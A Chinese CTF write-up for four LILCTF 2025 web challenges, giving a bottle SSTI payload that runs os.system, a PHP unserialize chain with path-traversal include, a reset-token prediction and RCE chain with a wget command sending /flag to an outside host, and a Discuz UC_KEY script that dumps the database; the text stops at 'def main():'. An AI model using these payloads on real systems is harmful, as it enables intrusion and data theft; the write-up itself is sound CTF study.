2025LILCTF
本文最后更新于 20 天前,其中的信息可能已经有所发展或是发生改变。

WEB

ez_bottle

给出附件:

from bottle import route, run, template, post, request, static_file, error
import os
import zipfile
import hashlib
import time

# hint: flag in /flag , have a try

UPLOAD_DIR = os.path.join(os.path.dirname(__file__), 'uploads')
os.makedirs(UPLOAD_DIR, exist_ok=True)

STATIC_DIR = os.path.join(os.path.dirname(__file__), 'static')
MAX_FILE_SIZE = 1 * 1024 * 1024

BLACK_DICT = ["{", "}", "os", "eval", "exec", "sock", "<", ">", "bul", "class", "?", ":", "bash", "_", "globals",
              "get", "open"]

def contains_blacklist(content):
    return any(black in content for black in BLACK_DICT)

def is_symlink(zipinfo):
    return (zipinfo.external_attr >> 16) & 0o170000 == 0o120000

def is_safe_path(base_dir, target_path):
    return os.path.realpath(target_path).startswith(os.path.realpath(base_dir))

@route('/')
def index():
    return static_file('index.html', root=STATIC_DIR)

@route('/static/<filename>')
def server_static(filename):
    return static_file(filename, root=STATIC_DIR)

@route('/upload')
def upload_page():
    return static_file('upload.html', root=STATIC_DIR)

@post('/upload')
def upload():
    zip_file = request.files.get('file')
    if not zip_file or not zip_file.filename.endswith('.zip'):
        return 'Invalid file. Please upload a ZIP file.'

    if len(zip_file.file.read()) > MAX_FILE_SIZE:
        return 'File size exceeds 1MB. Please upload a smaller ZIP file.'

    zip_file.file.seek(0)

    current_time = str(time.time())
    unique_string = zip_file.filename + current_time
    md5_hash = hashlib.md5(unique_string.encode()).hexdigest()
    extract_dir = os.path.join(UPLOAD_DIR, md5_hash)
    os.makedirs(extract_dir)

    zip_path = os.path.join(extract_dir, 'upload.zip')
    zip_file.save(zip_path)

    try:
        with zipfile.ZipFile(zip_path, 'r') as z:
            for file_info in z.infolist():
                if is_symlink(file_info):
                    return 'Symbolic links are not allowed.'

                real_dest_path = os.path.realpath(os.path.join(extract_dir, file_info.filename))
                if not is_safe_path(extract_dir, real_dest_path):
                    return 'Path traversal detected.'

            z.extractall(extract_dir)
    except zipfile.BadZipFile:
        return 'Invalid ZIP file.'

    files = os.listdir(extract_dir)
    files.remove('upload.zip')

    return template("文件列表: {{files}}\n访问: /view/{{md5}}/{{first_file}}",
                    files=", ".join(files), md5=md5_hash, first_file=files[0] if files else "nofile")

@route('/view/<md5>/<filename>')
def view_file(md5, filename):
    file_path = os.path.join(UPLOAD_DIR, md5, filename)
    if not os.path.exists(file_path):
        return "File not found."

    with open(file_path, 'r', encoding='utf-8') as f:
        content = f.read()

    if contains_blacklist(content):
        return "you are hacker!!!nonono!!!"

    try:
        return template(content)
    except Exception as e:
        return f"Error rendering template: {str(e)}"

@error(404)
def error404(error):
    return "bbbbbboooottle"

@error(403)
def error403(error):
    return "Forbidden: You don't have permission to access this resource."

if __name__ == '__main__':
    run(host='0.0.0.0', port=5000, debug=False)

主要用到的是两个路由:/upload/view

/upload路由没有直接的上传入口,本地起一个就好:

<!doctype html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <title>上传 ZIP 到 challenge</title>
  <style>
    body { font-family: Arial, sans-serif; padding:20px; }
    .box { max-width:600px; margin:auto; }
  </style>
</head>
<body>
  <div class="box">
    <h2>上传 ZIP 文件</h2>
    <form action="http://challenge.xinshi.fun:45318/upload" method="post" enctype="multipart/form-data">
      <label for="file">选择 ZIP 文件(.zip,≤1MB):</label><br>
      <input type="file" id="file" name="file" accept=".zip" required><br><br>
      <button type="submit">上传</button>
    </form>
    <p>上传后页面会显示服务器响应,其中可能包含访问 `/view/<md5>/<filename>` 的链接。</p>
  </div>
</body>
</html>

上传好文件会转到url/upload,并给出/view/<md5>/文件名

看了下waf的名单,过滤了一些ssti常用的函数,但是这里是bottle框架,斜体字变形后可绕过这些函数的限制,主要麻烦在于{}被过滤了,不好像平时那样构造ssti语句,但是用% 也可以来执行语句。

bottle斜体绕过:https://www.cnblogs.com/LAMENTXU/articles/18805019

尝试外带,发现不行,应该是不出网。

但是也不太好写文件(?反正我写出来有些困难),于是先发一个包,创建了一个/<md5>/文件名的路径,然后再将文件写入已有路径。

发现直接读取文件会回显hacker!,于是base64编码一下就能顺利拿出来了。

Payload:


% import 𝑜𝓈
% 𝑜𝓈.system('cat /flag | base64 |tee ./uploads/71a4f58fd00b711514d6d7f87a054afd/b.tpl')

解码后拿到flag:LILCTF{6o77Le_H@S_8EEn_reCYc13D}

Your Uns3r

源码:

<?php
highlight_file(__FILE__);
class User
{
    public $username;
    public $value;
    public function exec()
    {
        $ser = unserialize(serialize(unserialize($this->value)));
        if ($ser != $this->value && $ser instanceof Access) {
            include($ser->getToken());
        }
    }
    public function __destruct()
    {
        if ($this->username == "admin") {
            $this->exec();
        }
    }
}

class Access
{
    protected $prefix;
    protected $suffix;

    public function getToken()
    {
        if (!is_string($this->prefix) || !is_string($this->suffix)) {
            throw new Exception("Go to HELL!");
        }
        $result = $this->prefix . 'lilctf' . $this->suffix;
        if (strpos($result, 'pearcmd') !== false) {
            throw new Exception("Can I have peachcmd?");
        }
        return $result;

    }
}

$ser = $_POST["user"];
if (strpos($ser, 'admin') !== false && strpos($ser, 'Access":') !== false) {
    exit ("no way!!!!");
}

$user = unserialize($ser);
throw new Exception("nonono!!!");

同时发现页面上抛出了一个错误,这个错误来源于throw new Exception("nonono!!!");

Fatal error: Uncaught exception 'Exception' with message 'nonono!!!' in /var/www/html/index.php:47 Stack trace: #0 {main} thrown in /var/www/html/index.php on line 47

这个反序列化链子并不复杂,两个类UserAccessusername 必须为 "admin"Access对象传入前缀和后缀($prefix$suffix),然后经过过滤和拼接,再放进include($ser->getToken());中。

主要有几个点:绕过字符串检测(adminAccess":不能同时存在);字符串拼接(prefix . 'lilctf' . $this->suffix);垃圾回收机制(throw new Exception("nonono!!!");)。

绕过字符串检测,这里我绕的是admin,反序列化里大写S可以识别十六进制,所以只需要把s:5:"admin"换成S:5:"\61\64\6d\69\6e"即可。

字符串拼接会导致字符中间必然出现一个lilctf,考虑直接目录穿越穿出去,即:/lilctf/../../../../flag->/flag

最后是这个垃圾回收机制的绕过,当对象为NULL时也是可以触发__destruct的。

在一个 array 里面存在一个键值对,value 为某个类,当这个类为 NULL 的时候,会被认为是 is_ref 为 0,也就是 false,这就可以触发到 __destruct 方法。

晨曦师傅刚好就有博客总结了:

https://chenxi9981.github.io/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96

写个php生成一下payload,由于Access内存在protected属性,不太好赋值(我太菜了),所以这里直接手动构造了

<?php
class Access {
    protected $prefix;
    protected $suffix;
}

class User {
    public $username;
    public $value;
}

// 手动构造 Access 对象
$prefix = "/";
$suffix = "/../../../../flag";
$accessSerialized = 'O:6:"Access":2:{';
$accessSerialized .= 's:9:"' . "\0" . '*' . "\0" . 'prefix";s:' . strlen($prefix) . ':"' . $prefix . '";';
$accessSerialized .= 's:9:"' . "\0" . '*' . "\0" . 'suffix";s:' . strlen($suffix) . ':"' . $suffix . '";';
$accessSerialized .= '}';

// 构造 User 对象,用十六进制绕过admin的字符串检查
$userSerialized  = 'O:4:"User":2:{';
$userSerialized .= 's:8:"username";S:5:"\61\64\6d\69\6e";'; 
$userSerialized .= 's:5:"value";s:' . strlen($accessSerialized) . ':"' . $accessSerialized . '";';
$userSerialized .= '}';

// 绕过垃圾回收机制
$key = "user";
$payload  = 'a:2:{';
$payload .= 's:' . strlen($key) . ':"' . $key . '";' . $userSerialized;
$payload .= 's:' . strlen($key) . ':"' . $key . '";N;';
$payload .= '}';

echo $payload;
echo urlencode($payload);

Payload:

POST:
user=a%3A2%3A%7Bs%3A4%3A%22user%22%3BO%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3BS%3A5%3A%22%5C61%5C64%5C6d%5C69%5C6e%22%3Bs%3A5%3A%22value%22%3Bs%3A82%3A%22O%3A6%3A%22Access%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00prefix%22%3Bs%3A1%3A%22%2F%22%3Bs%3A9%3A%22%00%2A%00suffix%22%3Bs%3A17%3A%22%2F..%2F..%2F..%2F..%2Fflag%22%3B%7D%22%3B%7Ds%3A4%3A%22user%22%3BN%3B%7D

拿到flag:LILCTF{90Nn@_fIND_Your_4nSweR_t#_un53r}

Ekko_note

给出源码:

# -*- encoding: utf-8 -*-
'''
@File    :   app.py
@Time    :   2066/07/05 19:20:29
@Author  :   Ekko exec inc. 某牛马程序员 
'''
import os
import time
import uuid
import requests

from functools import wraps
from datetime import datetime
from secrets import token_urlsafe
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, render_template, redirect, url_for, request, flash, session

SERVER_START_TIME = time.time()

# 欸我艹这两行代码测试用的忘记删了,欸算了都发布了,我们都在用力地活着,跟我的下班说去吧。
# 反正整个程序没有一个地方用到random库。应该没有什么问题。
import random
random.seed(SERVER_START_TIME)

admin_super_strong_password = token_urlsafe()
app = Flask(__name__)
app.config['SECRET_KEY'] = 'your-secret-key-here'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False

db = SQLAlchemy(app)

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(20), unique=True, nullable=False)
    email = db.Column(db.String(120), unique=True, nullable=False)
    password = db.Column(db.String(60), nullable=False)
    is_admin = db.Column(db.Boolean, default=False)
    time_api = db.Column(db.String(200), default='https://api.uuni.cn//api/time')

class PasswordResetToken(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    token = db.Column(db.String(36), unique=True, nullable=False)
    used = db.Column(db.Boolean, default=False)

def padding(input_string):
    byte_string = input_string.encode('utf-8')
    if len(byte_string) > 6: byte_string = byte_string[:6]
    padded_byte_string = byte_string.ljust(6, b'\x00')
    padded_int = int.from_bytes(padded_byte_string, byteorder='big')
    return padded_int

with app.app_context():
    db.create_all()
    if not User.query.filter_by(username='admin').first():
        admin = User(
            username='admin',
            email='admin@example.com',
            password=generate_password_hash(admin_super_strong_password),
            is_admin=True
        )
        db.session.add(admin)
        db.session.commit()

def login_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('请登录', 'danger')
            return redirect(url_for('login'))
        return f(*args, **kwargs)
    return decorated_function

def admin_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('请登录', 'danger')
            return redirect(url_for('login'))
        user = User.query.get(session['user_id'])
        if not user.is_admin:
            flash('你不是admin', 'danger')
            return redirect(url_for('home'))
        return f(*args, **kwargs)
    return decorated_function

def check_time_api():
    user = User.query.get(session['user_id'])
    try:
        response = requests.get(user.time_api)
        data = response.json()
        datetime_str = data.get('date')
        if datetime_str:
            print(datetime_str)
            current_time = datetime.fromisoformat(datetime_str)
            return current_time.year >= 2066
    except Exception as e:
        return None
    return None
@app.route('/')
def home():
    return render_template('home.html')

@app.route('/server_info')
@login_required
def server_info():
    return {
        'server_start_time': SERVER_START_TIME,
        'current_time': time.time()
    }
@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form.get('username')
        email = request.form.get('email')
        password = request.form.get('password')
        confirm_password = request.form.get('confirm_password')

        if password != confirm_password:
            flash('密码错误', 'danger')
            return redirect(url_for('register'))

        existing_user = User.query.filter_by(username=username).first()
        if existing_user:
            flash('已经存在这个用户了', 'danger')
            return redirect(url_for('register'))

        existing_email = User.query.filter_by(email=email).first()
        if existing_email:
            flash('这个邮箱已经被注册了', 'danger')
            return redirect(url_for('register'))

        hashed_password = generate_password_hash(password)
        new_user = User(username=username, email=email, password=hashed_password)
        db.session.add(new_user)
        db.session.commit()

        flash('注册成功,请登录', 'success')
        return redirect(url_for('login'))

    return render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')

        user = User.query.filter_by(username=username).first()
        if user and check_password_hash(user.password, password):
            session['user_id'] = user.id
            session['username'] = user.username
            session['is_admin'] = user.is_admin
            flash('登陆成功,欢迎!', 'success')
            return redirect(url_for('dashboard'))
        else:
            flash('用户名或密码错误!', 'danger')
            return redirect(url_for('login'))

    return render_template('login.html')

@app.route('/logout')
@login_required
def logout():
    session.clear()
    flash('成功登出', 'info')
    return redirect(url_for('home'))

@app.route('/dashboard')
@login_required
def dashboard():
    return render_template('dashboard.html')

@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
    if request.method == 'POST':
        email = request.form.get('email')
        user = User.query.filter_by(email=email).first()
        if user:
            # 选哪个UUID版本好呢,好头疼 >_<
            # UUID v8吧,看起来版本比较新
            token = str(uuid.uuid8(a=padding(user.username))) # 可以自定义参数吗原来,那把username放进去吧
            reset_token = PasswordResetToken(user_id=user.id, token=token)
            db.session.add(reset_token)
            db.session.commit()
            # TODO:写一个SMTP服务把token发出去
            flash(f'密码恢复token已经发送,请检查你的邮箱', 'info')
            return redirect(url_for('reset_password'))
        else:
            flash('没有找到该邮箱对应的注册账户', 'danger')
            return redirect(url_for('forgot_password'))

    return render_template('forgot_password.html')

@app.route('/reset_password', methods=['GET', 'POST'])
def reset_password():
    if request.method == 'POST':
        token = request.form.get('token')
        new_password = request.form.get('new_password')
        confirm_password = request.form.get('confirm_password')

        if new_password != confirm_password:
            flash('密码不匹配', 'danger')
            return redirect(url_for('reset_password'))

        reset_token = PasswordResetToken.query.filter_by(token=token, used=False).first()
        if reset_token:
            user = User.query.get(reset_token.user_id)
            user.password = generate_password_hash(new_password)
            reset_token.used = True
            db.session.commit()
            flash('成功重置密码!请重新登录', 'success')
            return redirect(url_for('login'))
        else:
            flash('无效或过期的token', 'danger')
            return redirect(url_for('reset_password'))

    return render_template('reset_password.html')

@app.route('/execute_command', methods=['GET', 'POST'])
@login_required
def execute_command():
    result = check_time_api()
    if result is None:
        flash("API死了啦,都你害的啦。", "danger")
        return redirect(url_for('dashboard'))

    if not result:
        flash('2066年才完工哈,你可以穿越到2066年看看', 'danger')
        return redirect(url_for('dashboard'))

    if request.method == 'POST':
        command = request.form.get('command')
        os.system(command) # 什么?你说安全?不是,都说了还没完工催什么。
        return redirect(url_for('execute_command'))

    return render_template('execute_command.html')

@app.route('/admin/settings', methods=['GET', 'POST'])
@admin_required
def admin_settings():
    user = User.query.get(session['user_id'])
    
    if request.method == 'POST':
        new_api = request.form.get('time_api')
        user.time_api = new_api
        db.session.commit()
        flash('成功更新API!', 'success')
        return redirect(url_for('admin_settings'))

    return render_template('admin_settings.html', time_api=user.time_api)

if __name__ == '__main__':
    app.run(debug=False, host="0.0.0.0")

这里注释有提示:

# 欸我艹这两行代码测试用的忘记删了,欸算了都发布了,我们都在用力地活着,跟我的下班说去吧。
# 反正整个程序没有一个地方用到random库。应该没有什么问题。
import random
random.seed(SERVER_START_TIME)

# 选哪个UUID版本好呢,好头疼 >_<
            # UUID v8吧,看起来版本比较新
            token = str(uuid.uuid8(a=padding(user.username))) # 可以自定义参数吗原来,那把username放进去吧
            reset_token = PasswordResetToken(user_id=user.id, token=token)
            db.session.add(reset_token)
            db.session.commit()
            # TODO:写一个SMTP服务把token发出去

这里使用了 uuid.uuid8() 来生成密码重置 token。

根据 Python 的官方文档,uuid.uuid8() 的参数是可选的。如果某些参数没有被提供,uuid 模块会使用 random 模块的函数来生成随机数来填充这些缺失的部分。也就是说还是用到了导入的random库。

@app.route('/server_info')
@login_required
def server_info():
    return {
        'server_start_time': SERVER_START_TIME,
        'current_time': time.time()
    }

注意到这个/server_info路由,会回显服务器的启动时间。

SERVER_START_TIME 初始化了 random 模块的种子

uuid.uuid8(a=None, b=None, c=None)

a: 一个 48 位的整数。
b: 一个 16 位的整数。
c: 一个 64 位的整数。

a是固定的,b、c是random生成的,由于我们拿到了服务器的启动时间,相当于拿到了seed,也就能伪随机拿到生成的值。

让GPT帮我们改一下,做出预测token的脚本:

import random
import uuid

def padding(input_string):
    """    这必须与服务器上的 padding 函数完全相同。    """byte_string = input_string.encode('utf-8')
    if len(byte_string) > 6:
        byte_string = byte_string[:6]
    padded_byte_string = byte_string.ljust(6, b'\x00')
    padded_int = int.from_bytes(padded_byte_string, byteorder='big')
    return padded_int

# 1. 从 /server_info 接口获取的服务器启动时间
server_start_time = 1755245225.1615558

# 2. 使用与服务器完全相同的种子初始化 random 模块
random.seed(server_start_time)

# 3. 模拟服务器为 'admin' 用户生成 token 的过程
admin_username = 'admin'
padded_admin_username = padding(admin_username)

# 4. 调用 uuid.uuid8()。
predicted_token = str(uuid.uuid8(a=padded_admin_username))

print("-" * 30)
print(f"为 'admin' 用户预测的密码重置 Token 是:")
print(predicted_token)
print("-" * 30)

跑脚本得到重置密码的token,拿着去重置一下密码,邮箱就在源码里,为:admin@example.com

改密码登上admin,发现两个路由/execute_command(显示要2066年才开放)、/admin/settings(可以改时间的api),很明显需要伪造一个假的时间api来欺骗服务器,使其开放执行命令的功能

让GPT写一个,放到vps上开着就行:

from flask import Flask, jsonify

app = Flask(__name__)

@app.route('/time')
def fake_time():
    return jsonify({
        "date": "2066-01-01T00:00:00+00:00"
    })

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000)

然后就能进到/execute_command了,但rce无回显,这里考虑直接外带到vps上了,试了curl不太行,那就换成wget,读根目录时发现换行和空格会直接截断,导致后面的不显示了,于是base64编码一下。

Payload:

wget "http://1.94.60.237:8000?data=$(cat /flag | base64 -w 0)"

base64的-w 0参数:意思是取消自动换行(wrap)不然输出不完整

解码得到flag:LILCTF{U_h@v3_f0und_7H3_rl6hT_tlmELlNe!}

我曾经有一个工作

先做信息收集 发现是Discuz x3.5

逛了一圈没发现有明显的越权之类的点,考虑是复现历史cve,找cve的过程中似乎没什么特别符合这个场景的,但是题目描述:flag 在 pre_a_flag 表里,考虑存在sql注入或者任意文件读取(dump数据库)

Windows下Discuz x3.4的两种攻击思路:https://www.moonsec.com/2940.html

找到一些资料(?好像不咋有用),顺着他复现过程中的文件,让ai搜一搜几个泄漏点在我们的备份文件中是否存在

/api/source/config/config_ucenter.php发现泄露了UC_KEY,资料里面getshell之类的操作都是需要UC_KEY的,所以我们现在先判断一下UC_KEY能不能摸到后端。

让GPT帮忙写一个POC来验证一下UC_KEY能否摸到后端,那就奖励他写

GPT给出验证UC_KEY的POC(大体是向/api/uc.php发一个简单的xml,查看返回是否为“1”,判断是否被接收)

如果出问题,将文件名改为

import time
import argparse
import requests
from urllib.parse import urlencode

# Sends action=updateclient with benign settings payload
# This writes to uc_client/data/cache/settings.php on the server if accepted

def poc(base_url: str, uc_key: str):
    params = {
        'action': 'updateclient',
        'time': int(time.time())
    }
    code = build_uc_code(params, uc_key)
    url = f"{base_url.rstrip('/')}/api/uc.php"
    # Minimal XML payload expected by xml_unserialize -> dict
    xml = (
        "<?xml version='1.0' encoding='utf-8'?>"
        "<root><setting><foo>bar</foo></setting></root>"
    )
    resp = requests.post(url, params={'code': code}, data=xml.encode('utf-8'), headers={'Content-Type': 'application/xml'})
    return (resp.status_code, resp.text[:200], resp.url)

def main():
    ap = argparse.ArgumentParser(description='Discuz UC api/uc.php UC_KEY PoC (action=updateclient)')
    ap.add_argument('--base', required=True, help='Base URL of Discuz site, e.g. http://127.0.0.1')
    ap.add_argument('--key', required=True, help='UC_KEY from config/config_ucenter.php')
    args = ap.parse_args()

    sc, body, url = poc(args.base, args.key)
    print('[+] Request URL:', url)
    print('[+] HTTP', sc)
    print('[+] Body:', repr(body))
    if sc == 200 and body.strip() == '1':
        print('[+] SUCCESS: Server accepted updateclient; settings cache likely written')
    else:
        print('[-] FAIL or not vulnerable (status/body not matched)')

if __name__ == '__main__':
    main()

可以看到返回了“1”,就是说这个用来验证漏洞的xml成功写入了,也就是说UC_KEY被验证可用了,可以写入东西到缓存中

那就想直接任意文件读取是否可行,读取数据库,找一下pre_a_flag 表,让GPT5辅助我们一步步改一下poc(本来想着伪造admin先进后台的,但是发现好像能直接读取文件导出文件):

利用UC_KEY去触发api/db/dbbak.php,让服务器导出sql库

让AI帮我们改进脚本,进一步搜索pre_a_flag表中flag字段

得到POC:

import re
import time
import argparse
import hashlib
import base64
import requests
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

"""
PoC: Use UC_KEY to drive api/db/dbbak.php (apptype=discuzx) export flow,
follow nexturl chain, download SQL parts, and extract pre_a_flag rows.

This script is self-contained and does not import uc_poc to avoid import issues.
"""

def _rc4(data: bytes, key: bytes) -> bytes:
    s = list(range(256))
    j = 0
    out = bytearray()
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    for ch in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        k = s[(s[i] + s[j]) & 0xFF]
        out.append(ch ^ k)
    return bytes(out)

def authcode(string: str, operation: str, key: str, expiry: int = 3600) -> str:
    ckey_length = 4
    key = hashlib.md5(key.encode()).hexdigest()
    keya = hashlib.md5(key[0:16].encode()).hexdigest()
    keyb = hashlib.md5(key[16:32].encode()).hexdigest()
    if operation == 'DECODE':
        keyc = string[:ckey_length]
    else:
        keyc = hashlib.md5(str(time.time()).encode()).hexdigest()[-ckey_length:]
    cryptkey = (keya + hashlib.md5((keya + keyc).encode()).hexdigest()).encode()

    if operation == 'DECODE':
        string = base64.b64decode(string[ckey_length:] + '==').decode(errors='ignore')
    else:
        expiry_time = int(time.time()) + expiry if expiry else 0
        string = f"{expiry_time:010d}" + hashlib.md5((string + keyb).encode()).hexdigest()[0:16] + string
    result = _rc4(string.encode(), cryptkey)

    if operation == 'DECODE':
        try:
            result_str = result.decode(errors='ignore')
        except Exception:
            return ''
        if (result_str[:10] == '0' or int(result_str[:10]) > int(time.time())) and \
           result_str[10:26] == hashlib.md5((result_str[26:] + keyb).encode()).hexdigest()[0:16]:
            return result_str[26:]
        return ''
    else:
        encoded = base64.b64encode(result).decode().replace('=', '')
        return keyc + encoded

def build_uc_code(params: dict, uc_key: str) -> str:
    query = urlencode(params)
    return authcode(query, 'ENCODE', uc_key, expiry=3600)

def http_get(url, *, params=None, timeout=60, retries=3):
    last_exc = None
    for i in range(retries):
        try:
            r = requests.get(url, params=params, timeout=timeout)
            r.raise_for_status()
            return r
        except requests.exceptions.RequestException as e:
            last_exc = e
            time.sleep(2 * (i + 1))
    raise last_exc

def call_db_api(base_url: str, uc_key: str, params: dict):
    params = {**params, 'time': int(time.time())}
    code = build_uc_code(params, uc_key)
    url = f"{base_url.rstrip('/')}/api/db/dbbak.php"
    r = http_get(url, params={'apptype': 'discuzx', 'code': code}, timeout=90, retries=3)
    return r.text, r.url

def parse_xml_for_next_and_file(xml_text: str):
    # Returns (errorCode, errorMessage, nexturl, file_url)
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None, 'parse_error', None, None
    err = root.find('error')
    code = err.get('errorCode') if err is not None else None
    msg = err.get('errorMessage') if err is not None else ''
    fileinfo = root.find('fileinfo')
    file_url = None
    if fileinfo is not None:
        fu = fileinfo.find('file_url')
        if fu is not None and fu.text:
            file_url = fu.text.strip()
    nexturl_el = root.find('nexturl')
    nexturl = nexturl_el.text.strip() if nexturl_el is not None and nexturl_el.text else None
    return code, msg, nexturl, file_url

def list_backups(base_url: str, uc_key: str):
    # Call method=list, parse directories, return list of sqlpath names
    text, _ = call_db_api(base_url, uc_key, {'method': 'list'})
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return []
    sqlpaths = []
    for dirnode in root.findall('dir'):
        dn = dirnode.find('dirname')
        if dn is not None and dn.text:
            # take basename as sqlpath
            path = dn.text.strip().replace('\\', '/')
            sqlpaths.append(path.split('/')[-1])
    return sqlpaths

def view_backup_files(base_url: str, uc_key: str, sqlpath: str):
    text, _ = call_db_api(base_url, uc_key, {'method': 'view', 'sqlpath': sqlpath})
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return []
    urls = []
    for f in root.findall('file'):
        u = f.find('file_url')
        if u is not None and u.text:
            urls.append(u.text.strip())
    return urls

def export_and_collect(base_url: str, uc_key: str, sqlpath: str = None, backupfilename: str = None):
    if not sqlpath:
        # Let server generate default; otherwise use a plausible name
        sqlpath = ''
    if not backupfilename:
        backupfilename = ''

    collected = []
    # First try list/view existing backups to avoid heavy export
    existing = list_backups(base_url, uc_key)
    if existing:
        # pick the latest by name
        existing.sort(reverse=True)
        for sp in existing:
            urls = view_backup_files(base_url, uc_key, sp)
            if urls:
                return urls

    # Kick off export (may take longer on large DB, we use higher timeout and retries)
    text, first_url = call_db_api(base_url, uc_key, {
        'method': 'export',
        'sqlpath': sqlpath,
        'backupfilename': backupfilename,
        'volume': 0,
        'tableid': 0,
        'startfrom': 0,
    })

    while True:
        code, msg, nexturl, file_url = parse_xml_for_next_and_file(text)
        if code is None:
            raise RuntimeError('Invalid XML from server')
        if file_url:
            collected.append(file_url)
        # errorCode of 0 with nexturl means continue; without nexturl likely done
        # Some endings use "explor_success" message
        if nexturl:
            resp = http_get(nexturl, timeout=90, retries=3)
            text = resp.text
            continue
        else:
            break
    return collected

def _decode_hex_tokens(s: str) -> str:
    # Replace 0x<hex> with its utf-8 decoded string (best-effort)
    def repl(m):
        hexstr = m.group(1)
        try:
            b = bytes.fromhex(hexstr)
            return b.decode('utf-8', errors='ignore')
        except Exception:
            return m.group(0)
    return re.sub(r"0x([0-9a-fA-F]+)", repl, s)

def extract_flag_from_sql(sql_text: str):
    # Look for INSERT INTO pre_a_flag ... VALUES (...)
    lines = [ln for ln in sql_text.splitlines() if 'INSERT INTO' in ln and 'pre_a_flag' in ln]
    if not lines:
        return None, None
    flag_pat = re.compile(r"\b(?:FLAG|flag|CTF)\{[^\}]*\}")
    for ln in lines:
        # Try decoded version first
        ln_dec = _decode_hex_tokens(ln)
        m = flag_pat.search(ln_dec)
        if m:
            return m.group(0), ln_dec
        # Fallback: try on raw line
        m = flag_pat.search(ln)
        if m:
            return m.group(0), ln
    # Last resort: pick first decoded quoted string
    decoded_join = '\n'.join(_decode_hex_tokens(ln) for ln in lines)
    m_all = re.findall(r"'([^']{4,})'", decoded_join)
    return (m_all[0] if m_all else None), (lines[0] if lines else None)

def _parse_create_table_columns(sql_text: str, table: str):
    # Extract column names from CREATE TABLE for given table
    # Return list of column names or empty list if not found
    pat = re.compile(r"CREATE\s+TABLE\s+`?" + re.escape(table) + r"`?\s*\(", re.IGNORECASE)
    m = pat.search(sql_text)
    if not m:
        return []
    start = m.end()
    # find matching closing paren
    depth = 1
    i = start
    while i < len(sql_text) and depth > 0:
        ch = sql_text[i]
        if ch == '(':
            depth += 1
        elif ch == ')':
            depth -= 1
        i += 1
    section = sql_text[start:i-1]
    cols = []
    for line in section.splitlines():
        line = line.strip()
        if not line or line.upper().startswith(('PRIMARY KEY', 'KEY', 'UNIQUE KEY', 'CONSTRAINT', 'FULLTEXT KEY')):
            continue
        mcol = re.match(r"`([^`]+)`\s+", line)
        if mcol:
            cols.append(mcol.group(1))
    return cols

def _sql_unescape(s: str) -> str:
    # Reverse of mysqli::escape_string for typical sequences
    # NOTE: Keep simple; handle \\ and \' and \n, \r, \t
    s = s.replace("\\'", "'")
    s = s.replace('\\"', '"')
    s = s.replace('\\n', '\n').replace('\\r', '\r').replace('\\t', '\t')
    s = s.replace('\\\\', '\\')
    return s

def _parse_values_tuple(valstr: str):
    # Parse a single parenthesized VALUES tuple content into a list of Python strings
    # Handles: 'quoted', 0xHEX, NULL, numbers
    out = []
    i, n = 0, len(valstr)
    def skip_ws(j):
        while j < n and valstr[j].isspace():
            j += 1
        return j
    while i < n:
        i = skip_ws(i)
        if i >= n:
            break
        ch = valstr[i]
        # NULL
        if valstr[i:i+4].upper() == 'NULL':
            out.append(None)
            i += 4
        # 0x hex literal
        elif i+1 < n and valstr[i] == '0' and (valstr[i+1] in 'xX'):
            i += 2
            j = i
            while j < n and re.match(r'[0-9a-fA-F]', valstr[j]):
                j += 1
            hexstr = valstr[i:j]
            try:
                b = bytes.fromhex(hexstr)
                out.append(b.decode('utf-8', errors='ignore'))
            except Exception:
                out.append('')
            i = j
        # quoted string
        elif ch == "'":
            i += 1
            buf = []
            while i < n:
                c = valstr[i]
                if c == '\\' and i + 1 < n:
                    buf.append(valstr[i:i+2])
                    i += 2
                    continue
                if c == "'":
                    i += 1
                    break
                buf.append(c)
                i += 1
            out.append(_sql_unescape(''.join(buf)))
        else:
            # number or bareword until comma or end
            j = i
            while j < n and valstr[j] not in ',':
                j += 1
            token = valstr[i:j].strip()
            out.append(token)
            i = j
        # skip comma
        i = skip_ws(i)
        if i < n and valstr[i] == ',':
            i += 1
    return out

def dump_table_from_sqltexts(sql_texts, table: str):
    # Extract column names and all rows from list of SQL file texts
    cols = []
    for txt in sql_texts:
        cols = _parse_create_table_columns(txt, table)
        if cols:
            break
    rows = []
    ins_re = re.compile(r"INSERT\s+INTO\s+`?" + re.escape(table) + r"`?\s+VALUES\s*\((.*)\);", re.IGNORECASE)
    for txt in sql_texts:
        for line in txt.splitlines():
            if 'INSERT INTO' not in line or table not in line:
                continue
            m = ins_re.search(line)
            if not m:
                continue
            vals = _parse_values_tuple(m.group(1))
            rows.append(vals)
    return cols, rows

def dump_table_via_backup(base_url: str, uc_key: str, table: str):
    urls = export_and_collect(base_url, uc_key)
    if not urls:
        return None, None
    sess = requests.Session()
    texts = []
    for u in urls:
        r = sess.get(u, timeout=90)
        if r.status_code != 200:
            continue
        body = r.text.replace('# <?php exit();?>\n', '')
        texts.append(body)
    cols, rows = dump_table_from_sqltexts(texts, table)
    return cols, rows

def main():
